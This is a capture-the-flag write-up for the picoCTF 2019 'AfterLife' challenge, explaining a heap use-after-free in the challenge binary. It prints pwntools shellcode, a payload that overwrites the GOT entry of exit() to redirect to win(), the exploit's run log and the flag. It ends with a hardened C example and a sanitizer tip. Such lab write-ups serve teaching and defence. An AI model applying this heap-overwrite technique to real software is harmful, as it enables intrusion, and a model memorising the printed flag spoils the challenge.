# AfterLife

## Problem

> Just pwn this program and get a flag. It's also found in /problems/afterlife\_2\_049150f2f8b03c16dc0382de6e2e2215 on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/AfterLife/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/AfterLife/vuln.c)

## Solution

1. This problem is nearly identical to the "SecondLife" challenge. I recommend reading that write-up first since it covers the concepts needed to understand the following steps. Compared to "SecondLife," instead of freeing the first chunk twice, this program simply writes to the first chunk on lines 32 and 33 after it has been freed on line 29. This is known as a use-after-free vulnerability. The setup is exactly the same as the double-free exploit: the call to `malloc()` on line 34 replaces the GOT address of `exit()` with the address of the shellcode, and the call to `exit()` on line 35 invokes the shellcode.
2. Use-after-free vulnerability:

   ```c
   free(first); // <-- 'first' is freed
   free(third);
   fifth=malloc(128);
   puts("you will write on first after it was freed... an overflow will not be very useful...");
   gets(first); // <-- 'first' is used
   ```
3. We can use the same payload code as before:

   ```python
   shell_code = asm('jmp l1; nop;nop;nop;nop;nop;nop;nop;nop;nop;nop;nop;nop; l1: push {}; ret;'.format(hex(exe.symbols["win"])))
   payload = p32(exe.got["exit"] - 12) + p32(address + 8) + shell_code
   ```

   We add 8 bytes to address (which is the base address of the `first` buffer) since that's where we located our shellcode, right after `p32(exe.got["exit"] - 12) + p32(address + 8)`.
4. Note: Line 25 in this challenge differs from "SecondLife". `fgets(first, LINE_BUFFER_SIZE, stdin);` was changed to `strncpy(first,argv[1],LINE_BUFFER_SIZE);`, so we need to pass an argument to the process when we launch it from the command line to get past line 25. Previously we just sent a single enter, since `fgets` was used instead of `strncpy`.
5. Run the [script.py](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/AfterLife/script.py) `python script.py USER=<username> PASSWORD=<password>`:

   ```
    [*] '~/Documents/PicoCTF/Binary Exploitation/AfterLife/vuln'
        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    Canary found
        NX:       NX disabled
        PIE:      No PIE (0x8048000)
        RWX:      Has RWX segments
    [+] Connecting to 2019shell1.picoctf.com on port 22: Done
    [*] <username>@2019shell1.picoctf.com:
        Distro    Ubuntu 18.04
        OS:       linux
        Arch:     amd64
        Version:  4.15.0
        ASLR:     Enabled
    [+] Opening new channel: 'pwd': Done
    [+] Receiving all data: Done (14B)
    [*] Closed SSH channel with 2019shell1.picoctf.com
    [*] Working directory: '/tmp/tmp.iglmDgay5w'
    [+] Opening new channel: 'ln -s /home/<username>/* .': Done
    [+] Receiving all data: Done (0B)
    [*] Closed SSH channel with 2019shell1.picoctf.com
    [*] win address: 0x8048966
    [*] exit address: 0x804d02c
    [+] Starting remote process b'/problems/afterlife_2_049150f2f8b03c16dc0382de6e2e2215/vuln' on 2019shell1.picoctf.com: pid 1695575
    [*] first address: 0x8836008
    [*] shellcode:
        00000000  eb 0c 90 90  90 90 90 90  90 90 90 90  90 90 68 66  │····│····│····│··hf│
        00000010  89 04 08 c3                                         │····│
        00000014
    [*] payload:
        00000000  20 d0 04 08  10 60 83 08  eb 0c 90 90  90 90 90 90  │ ···│·`··│····│····│
        00000010  90 90 90 90  90 90 68 66  89 04 08 c3               │····│··hf│····│
        0000001c
    [+] picoCTF{what5_Aft3r_187f3d9a}
   ```
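The snippet in step 2 is the whole bug: `first` is freed on line 29 and then written through on line 33. Below is an added example (not code from the challenge or this repository) showing the hardened shape of that pattern: the buffer is wrapped in a hypothetical `owned_buf` record whose liveness flag is cleared on free, the pointer is nulled, and the unbounded `gets()` is replaced by a bounded copy that refuses to touch a released buffer. `replay_afterlife()` walks the challenge's allocate/free/write order with these helpers.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LINE_BUFFER_SIZE 128

/* Hypothetical owner record (not from vuln.c): a liveness flag cleared on
 * free, so a later write is refused rather than hitting the freed chunk. */
typedef struct {
    char *buf;
    int live;
} owned_buf;

static owned_buf owned_alloc(size_t n) {
    owned_buf o = { malloc(n), 1 };
    if (o.buf == NULL) o.live = 0;
    return o;
}

static void owned_free(owned_buf *o) {
    free(o->buf);
    o->buf = NULL;   /* no dangling pointer survives the free */
    o->live = 0;
}

/* Replacement for gets(first): bounded copy that is refused outright once
 * the buffer has been released.
 * Returns 0 on success, -1 on use-after-free, -2 if input was truncated. */
static int write_line(owned_buf *o, const char *input) {
    if (!o->live || o->buf == NULL) return -1;
    size_t len = strlen(input);
    size_t n = len < LINE_BUFFER_SIZE - 1 ? len : LINE_BUFFER_SIZE - 1;
    memcpy(o->buf, input, n);
    o->buf[n] = '\0';
    return len > n ? -2 : 0;
}

/* Replays the challenge's order of operations with the hardened helpers:
 * allocate 'first', free it, then attempt the write vuln.c does with gets(). */
static int replay_afterlife(const char *input) {
    owned_buf first = owned_alloc(LINE_BUFFER_SIZE);
    owned_free(&first);
    return write_line(&first, input);
}

int main(void) {
    printf("write after free -> %d\n", replay_afterlife("payload"));
    return 0;
}
```

Building the original `vuln.c` with `-fsanitize=address` also reports the write on line 33 as a heap-use-after-free at runtime, which is the quickest way to confirm the bug before refactoring.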

### Flag

`picoCTF{what5_Aft3r_187f3d9a}`
